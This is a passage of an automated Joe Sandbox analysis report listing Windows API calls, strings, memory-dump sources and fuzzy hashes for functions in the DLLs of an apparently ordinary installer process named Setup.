                                                              • __EH_prolog3.LIBCMT ref: 6C947E7F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
                                                              • API String ID: 431132790-3357067047
                                                              • Opcode ID: 71c81445299c3e1f55dbc1e844638c657a295d7707925db7a29893534447b19c
                                                              • Instruction ID: ebe11a007a6df15ab6fb2813a0a22215f9589300a662d3e2e3140e9d9f5d4108
                                                              • Opcode Fuzzy Hash: 71c81445299c3e1f55dbc1e844638c657a295d7707925db7a29893534447b19c
                                                              • Instruction Fuzzy Hash: AE214B71900149ABDF04DBA8C944ADEBBF9AF25208F14844AE110E7B81C735DA19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 6C938F00
                                                                • Part of subcall function 6C968244: GetWindowLongW.USER32(?,000000F0), ref: 6C96826A
                                                                • Part of subcall function 6C968244: GetParent.USER32(?), ref: 6C96827C
                                                                • Part of subcall function 6C968244: GetWindowRect.USER32(?,?), ref: 6C968296
                                                                • Part of subcall function 6C968244: GetWindowLongW.USER32(00000000,000000F0), ref: 6C9682AC
                                                                • Part of subcall function 6C968244: MonitorFromWindow.USER32(?,00000002), ref: 6C9682CB
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6C938F15
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6C938F25
                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6C938F32
                                                                • Part of subcall function 6C94BC49: SendMessageW.USER32(?,00000172,00000000,?), ref: 6C94BC5A
                                                              • GetDesktopWindow.USER32 ref: 6C938F44
                                                                • Part of subcall function 6C968244: GetWindow.USER32(?,00000004), ref: 6C968288
                                                                • Part of subcall function 6C968244: GetMonitorInfoW.USER32(00000000,?), ref: 6C9682E8
                                                                • Part of subcall function 6C968244: SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 6C9683B8
                                                              • ShowWindow.USER32(?,00000001), ref: 6C938F57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$Monitor$CreateDesktopFromImageInfoLoadMessageParentRectSendShow
                                                              • String ID: STATIC
                                                              • API String ID: 4041997823-1882779555
                                                              • Opcode ID: 41226ef0a713ffd10a4ca9b43314ccb350529ce9536631fdf05912a10e750f26
                                                              • Instruction ID: e686392c7db538dbd5c901e2c0074213c634254f6949d37d896f24a4911137f0
                                                              • Opcode Fuzzy Hash: 41226ef0a713ffd10a4ca9b43314ccb350529ce9536631fdf05912a10e750f26
                                                              • Instruction Fuzzy Hash: 5111B171605210BFDB205F2A8C08EDB7FBDEF9A364F100629B469D2290DB729810CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C95ACDF
                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,6C9449C0,6C90A5D8,6C90A54C), ref: 6C95AD06
                                                              • GetLastError.KERNEL32 ref: 6C95AD08
                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 6C95AD81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 654496852-0
                                                              • Opcode ID: 0984bb99c4a18442ea2a8d52da5c86c480af0b8c0eb2a6faf7e587e66d87ef46
                                                              • Instruction ID: de8f826a1847cbf85ace70ff3a54346142d4229a79fb454025b4f37d881fa7b9
                                                              • Opcode Fuzzy Hash: 0984bb99c4a18442ea2a8d52da5c86c480af0b8c0eb2a6faf7e587e66d87ef46
                                                              • Instruction Fuzzy Hash: 4F3101329005259BCB22EF69C840AFE77B8AF15769B614111E900BBA50CB30CE65CBF8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C925B82: __EH_prolog3_GS.LIBCMT ref: 6C925B8C
                                                                • Part of subcall function 6C925B82: _memset.LIBCMT ref: 6C925BBB
                                                                • Part of subcall function 6C925B82: FindFirstFileW.KERNEL32(?,?,????), ref: 6C925BDA
                                                                • Part of subcall function 6C925B82: FindClose.KERNEL32(?), ref: 6C925CC1
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925FF0
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C925EF1
                                                                • Part of subcall function 6C925CE1: __EH_prolog3.LIBCMT ref: 6C925CE8
                                                                • Part of subcall function 6C925CE1: CoInitialize.OLE32(00000000), ref: 6C925D1A
                                                                • Part of subcall function 6C925CE1: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000), ref: 6C925D38
                                                                • Part of subcall function 6C925CE1: CoUninitialize.OLE32(?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C925DE8
                                                                • Part of subcall function 6C925CE1: SysFreeString.OLEAUT32(00000738), ref: 6C925DF1
                                                              Strings
                                                              • LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 6C925F87
                                                              • LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 6C926026
                                                              • ParameterInfo.xml, xrefs: 6C925E45, 6C925FA2
                                                              • LocalizedData.xml, xrefs: 6C925EDF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
                                                              • String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
                                                              • API String ID: 2922719316-412676173
                                                              • Opcode ID: 241ad25c5bea36a44d33f79f45874aeabba67f657b5a493bee9b0c569caa2217
                                                              • Instruction ID: d5603774c16df7a59aaae5fe527f85e24b11558ca9f8608bebd73f9131b50789
                                                              • Opcode Fuzzy Hash: 241ad25c5bea36a44d33f79f45874aeabba67f657b5a493bee9b0c569caa2217
                                                              • Instruction Fuzzy Hash: FF616B724183859FC710DFA8C844A8AB7E8BFA5318F044A5DF0E597B95DB34E909CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C924DC7
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C948C7A: __EH_prolog3.LIBCMT ref: 6C948C81
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C924ED4
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C924DE8
                                                              • \LocalizedData.xml. Duplicates not allowed., xrefs: 6C924E34
                                                              • Found duplicate ID attribute ", xrefs: 6C924DF8
                                                              • " for Text element in , xrefs: 6C924E0D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: " for Text element in $Found duplicate ID attribute "$ParameterInfo.xml$\LocalizedData.xml. Duplicates not allowed.
                                                              • API String ID: 3417717588-3340550128
                                                              • Opcode ID: 91965a3a038d4893ef702c599d00274d22749701a5c0be8ef73491ae15f064a9
                                                              • Instruction ID: 529f91b6eb9fd8d3ae14329ec832b1e8bec575d82e4fb89928c24f1fa4138197
                                                              • Opcode Fuzzy Hash: 91965a3a038d4893ef702c599d00274d22749701a5c0be8ef73491ae15f064a9
                                                              • Instruction Fuzzy Hash: 26414E72811008EFDB14DBE8C950AEDB7B8AF39368F148245F125E7BC1DB30DA5987A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C954026
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C954041
                                                              • GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104), ref: 6C9540B3
                                                              • PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C954101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
                                                              • String ID: %04d\%s$DHTMLHeader.html
                                                              • API String ID: 3575165106-1224721414
                                                              • Opcode ID: 6b0fcbd5d38f7a3ef4ea49ed0840ca86c84f24dda2ba13e3b2a27f5523ebdb28
                                                              • Instruction ID: ec3627bce43d9b1abb69b2d02acfa6fbef2ea5380023704ef7cc86419879d3a1
                                                              • Opcode Fuzzy Hash: 6b0fcbd5d38f7a3ef4ea49ed0840ca86c84f24dda2ba13e3b2a27f5523ebdb28
                                                              • Instruction Fuzzy Hash: 79418E71A0010ADFDF04DFA4C888AEEBBB5BF21358F044529E111E7B91DB30DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C4A6041: __EH_prolog3.LIBCMT ref: 6C4A6048
                                                                • Part of subcall function 6C4A6041: GetCommandLineW.KERNEL32(0000001C,6C4930C2,?), ref: 6C4A604D
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 6C493136
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CommandExceptionH_prolog3LineRaise
                                                              • String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
                                                              • API String ID: 683617612-791770018
                                                              • Opcode ID: e718444658bb634a4b2683663ee2da5cdb395cc66e13a7c4f3595370d43e6a15
                                                              • Instruction ID: a904034bb7716b55e25c6764054f381369d4eb935863723d3771ecf678c526fa
                                                              • Opcode Fuzzy Hash: e718444658bb634a4b2683663ee2da5cdb395cc66e13a7c4f3595370d43e6a15
                                                              • Instruction Fuzzy Hash: 3601F072145968A7DA30D75DC806F86BF79EB83768F168015FA1C87F44DB32D4478291
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,0000000D), ref: 6C4B21A5
                                                              • HeapAlloc.KERNEL32(00000000), ref: 6C4B21AC
                                                                • Part of subcall function 6C4B20F9: IsProcessorFeaturePresent.KERNEL32(0000000C), ref: 6C4B20FB
                                                              • InterlockedPopEntrySList.KERNEL32(00846238), ref: 6C4B21BF
                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6C4B21D0
                                                              • InterlockedPopEntrySList.KERNEL32 ref: 6C4B21E8
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C4B21F8
                                                              • InterlockedPushEntrySList.KERNEL32(00000000), ref: 6C4B220F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                              • String ID:
                                                              • API String ID: 2304957937-0
                                                              • Opcode ID: 770dd855a2c4d18a0646ea9fddd4f88a46130288eebd424b25768eb9cdff1de6
                                                              • Instruction ID: fecf167ce10d9df066a5dc82ce53f8667c16784db64a7dc74364b7d915730084
                                                              • Opcode Fuzzy Hash: 770dd855a2c4d18a0646ea9fddd4f88a46130288eebd424b25768eb9cdff1de6
                                                              • Instruction Fuzzy Hash: E501F931385A1197DB31E7A88C0CF4A36B4BB4B786F150529FE14F7A48CE70D80257B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4933FA
                                                              • LoadLibraryW.KERNEL32(?,00000008,6C493377,?), ref: 6C493427
                                                              • GetLastError.KERNEL32 ref: 6C493437
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                              • GetLastError.KERNEL32 ref: 6C49344B
                                                              • __CxxThrowException@8.LIBCMT ref: 6C49346E
                                                              Strings
                                                              • ::LoadLibrary(%s) failed with error %d, xrefs: 6C49343C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
                                                              • String ID: ::LoadLibrary(%s) failed with error %d
                                                              • API String ID: 3804648058-20907036
                                                              • Opcode ID: 842e87b8f50c2c963f9c6768f5ed87b659d2c2eb9c018a511950f6de0433bfab
                                                              • Instruction ID: f812c2fc176bf1f2f0c361aa395dee6318af069d6a83028526990d6b03e12970
                                                              • Opcode Fuzzy Hash: 842e87b8f50c2c963f9c6768f5ed87b659d2c2eb9c018a511950f6de0433bfab
                                                              • Instruction Fuzzy Hash: 3C01BCB19011069FDB00DBA8C805FAEBEB0FF02304F108529E418EBB54DB31D9158BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91548C
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C917DAF,?,?,?,?,?,00000000,?,?,6C90AB18,00000008,6C917CD9), ref: 6C91549C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C9154B9
                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C9154E0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2427612476-192647395
                                                              • Opcode ID: 8c148f4bc6aa7567a45c0d70139dd223e0b8b31857367c0fd83e3290852088c4
                                                              • Instruction ID: 319c6a4a0cac0522a17eec928eb92dfb739e41339b42a5b94d2a5154e76b1972
                                                              • Opcode Fuzzy Hash: 8c148f4bc6aa7567a45c0d70139dd223e0b8b31857367c0fd83e3290852088c4
                                                              • Instruction Fuzzy Hash: 59F09671B15609ABDB14DBA5D905BCD327AAFA0709F518825F000E7E40DBB8C505C7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSecurityDescriptorLength.ADVAPI32(?,6C90A5CC,?), ref: 6C943A1F
                                                              • _malloc.LIBCMT ref: 6C943A29
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • GetSecurityDescriptorControl.ADVAPI32(?,00000002,6C947448), ref: 6C943A49
                                                              • _free.LIBCMT ref: 6C943A5D
                                                              • _memcpy_s.LIBCMT ref: 6C943A80
                                                              • MakeSelfRelativeSD.ADVAPI32(?,6C94744C,6C94744C), ref: 6C943A97
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DescriptorSecurity$AllocateControlHeapLengthMakeRelativeSelf_free_malloc_memcpy_s
                                                              • String ID:
                                                              • API String ID: 2479111529-0
                                                              • Opcode ID: 78416dca488951313f1ce607948676ae133c084726cb9ea94fca92c5eb522ee7
                                                              • Instruction ID: cd5ef291faa21a4cb1058b311598b3d3dba7d6683b7dc24d0f6f43f375b9c2e6
                                                              • Opcode Fuzzy Hash: 78416dca488951313f1ce607948676ae133c084726cb9ea94fca92c5eb522ee7
                                                              • Instruction Fuzzy Hash: 0211C872940204BBEB119BB69804EAFBBFCFF95658F10802AF515E3E40EB30D645D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C94F8D8
                                                              • GetCommandLineW.KERNEL32(00000044,6C948323,00000000), ref: 6C94F8EA
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • __time64.LIBCMT ref: 6C94FA7B
                                                                • Part of subcall function 6C9472E4: __EH_prolog3_catch.LIBCMT ref: 6C9472EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch$CommandH_prolog3Line__time64
                                                              • String ID: %TEMP%\$Setup
                                                              • API String ID: 3716462386-3413213476
                                                              • Opcode ID: fb6ebf3dabb018811a1f6b85f11b12be22912a0e7d7fd600c6cf39cdfd70a07d
                                                              • Instruction ID: 6fa7aad2bf124276ee2f8e1f4293b4e8aaf515c511c59d27478a4470aecb47f3
                                                              • Opcode Fuzzy Hash: fb6ebf3dabb018811a1f6b85f11b12be22912a0e7d7fd600c6cf39cdfd70a07d
                                                              • Instruction Fuzzy Hash: BE7138719012499FCF04CFE8C984AEDBBB5BF69318F24415AE011BBB90DB34DA48CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C933EB9
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
                                                              • API String ID: 431132790-3784926136
                                                              • Opcode ID: 9cec193e00c16fef90edaf7d3954423766bcbe789e914f19bb156b116905e6fe
                                                              • Instruction ID: ff39c9d5f84cc59cc2d5adc930c5d0f291b860fb2855367149232813b56a31da
                                                              • Opcode Fuzzy Hash: 9cec193e00c16fef90edaf7d3954423766bcbe789e914f19bb156b116905e6fe
                                                              • Instruction Fuzzy Hash: 6E518A71904249EFDF10DFA8C945AEE7BB8AF29318F148459F814EBB81C734DA05CBA1
                                                              Uniqueness

